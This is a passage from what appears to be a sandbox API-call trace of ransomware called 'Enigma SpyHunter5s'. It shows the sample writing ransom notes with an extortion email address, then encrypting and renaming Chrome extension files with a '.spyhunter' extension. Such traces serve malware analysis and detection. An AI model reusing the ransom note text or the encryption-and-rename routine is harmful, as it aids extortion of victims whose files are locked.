support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.191] WriteFile (in: hFile=0x178, lpBuffer=0x270ea63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x270ea63*, lpNumberOfBytesWritten=0x270eb8c*=0x127, lpOverlapped=0x0) returned 1 [0157.191] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.191] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb8c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.192] CloseHandle (hObject=0x178) returned 1 [0157.192] GetProcessHeap () returned 0x2c0000 [0157.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8078 | out: hHeap=0x2c0000) returned 1 [0157.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb28 | out: pbBuffer=0x270eb28) returned 1 [0157.192] GetProcessHeap () returned 0x2c0000 [0157.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb20*=0x30) returned 1 [0157.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0157.193] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.193] GetProcessHeap () returned 0x2c0000 [0157.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.193] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eae4*=0x2800, lpOverlapped=0x0) returned 1 [0157.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.216] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eae4*=0x2800, lpOverlapped=0x0) returned 1 [0157.216] GetProcessHeap () returned 0x2c0000 [0157.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.216] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.216] WriteFile (in: hFile=0x178, lpBuffer=0x270eb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x270eb24*, lpNumberOfBytesWritten=0x270eae4*=0x4, lpOverlapped=0x0) returned 1 [0157.216] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eae4*=0x30, lpOverlapped=0x0) returned 1 [0157.216] CloseHandle (hObject=0x178) returned 1 [0157.216] GetProcessHeap () returned 0x2c0000 [0157.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.216] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.spyhunter") returned 174 [0157.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0157.217] GetProcessHeap () returned 0x2c0000 [0157.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.217] GetProcessHeap () returned 0x2c0000 [0157.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.218] GetProcessHeap () returned 0x2c0000 [0157.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb7ee0 | out: hHeap=0x2c0000) returned 1 [0157.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.219] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.219] WriteFile (in: hFile=0x178, lpBuffer=0x270ea5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x270ea5b*, lpNumberOfBytesWritten=0x270eb84*=0x127, lpOverlapped=0x0) returned 1 [0157.219] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.219] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb84*=0x2ac, lpOverlapped=0x0) returned 1 [0157.220] CloseHandle (hObject=0x178) returned 1 [0157.220] GetProcessHeap () returned 0x2c0000 [0157.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5208 | out: hHeap=0x2c0000) returned 1 [0157.220] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb20 | out: pbBuffer=0x270eb20) returned 1 [0157.220] GetProcessHeap () returned 0x2c0000 [0157.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.220] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb18*=0x30) returned 1 [0157.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json") returned 164 [0157.221] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.221] GetProcessHeap () returned 0x2c0000 [0157.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.221] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eadc*=0x2800, lpOverlapped=0x0) returned 1 [0157.246] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.247] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eadc*=0x2800, lpOverlapped=0x0) returned 1 [0157.247] GetProcessHeap () returned 0x2c0000 [0157.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.247] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.247] WriteFile (in: hFile=0x178, lpBuffer=0x270eb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x270eb1c*, lpNumberOfBytesWritten=0x270eadc*=0x4, lpOverlapped=0x0) returned 1 [0157.247] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eadc*=0x30, lpOverlapped=0x0) returned 1 [0157.247] CloseHandle (hObject=0x178) returned 1 [0157.247] GetProcessHeap () returned 0x2c0000 [0157.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.248] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.spyhunter") returned 174 [0157.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0157.249] GetProcessHeap () returned 0x2c0000 [0157.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.249] GetProcessHeap () returned 0x2c0000 [0157.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.249] GetProcessHeap () returned 0x2c0000 [0157.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5070 | out: hHeap=0x2c0000) returned 1 [0157.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.250] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.250] WriteFile (in: hFile=0x178, lpBuffer=0x270ea53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x270ea53*, lpNumberOfBytesWritten=0x270eb7c*=0x127, lpOverlapped=0x0) returned 1 [0157.251] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.251] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb7c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.251] CloseHandle (hObject=0x178) returned 1 [0157.251] GetProcessHeap () returned 0x2c0000 [0157.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4548 | out: hHeap=0x2c0000) returned 1 [0157.252] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb18 | out: pbBuffer=0x270eb18) returned 1 [0157.252] GetProcessHeap () returned 0x2c0000 [0157.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.252] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb10*=0x30) returned 1 [0157.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0157.253] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.253] GetProcessHeap () returned 0x2c0000 [0157.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.253] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.265] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.266] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.266] GetProcessHeap () returned 0x2c0000 [0157.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.266] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.266] WriteFile (in: hFile=0x178, lpBuffer=0x270eb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x270eb14*, lpNumberOfBytesWritten=0x270ead4*=0x4, lpOverlapped=0x0) returned 1 [0157.266] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ead4*=0x30, lpOverlapped=0x0) returned 1 [0157.267] CloseHandle (hObject=0x178) returned 1 [0157.267] GetProcessHeap () returned 0x2c0000 [0157.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.267] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.spyhunter") returned 174 [0157.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.spyhunter")) returned 1 [0157.268] GetProcessHeap () returned 0x2c0000 [0157.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.268] GetProcessHeap () returned 0x2c0000 [0157.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.268] GetProcessHeap () returned 0x2c0000 [0157.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe43b0 | out: hHeap=0x2c0000) returned 1 [0157.268] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb18 | out: pbBuffer=0x270eb18) returned 1 [0157.268] GetProcessHeap () returned 0x2c0000 [0157.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb10*=0x30) returned 1 [0157.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0157.269] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.269] GetProcessHeap () returned 0x2c0000 [0157.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.269] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.281] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.282] GetProcessHeap () returned 0x2c0000 [0157.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.282] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.282] WriteFile (in: hFile=0x178, lpBuffer=0x270eb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x270eb14*, lpNumberOfBytesWritten=0x270ead4*=0x4, lpOverlapped=0x0) returned 1 [0157.282] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ead4*=0x30, lpOverlapped=0x0) returned 1 [0157.282] CloseHandle (hObject=0x178) returned 1 [0157.282] GetProcessHeap () returned 0x2c0000 [0157.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.283] wnsprintfW 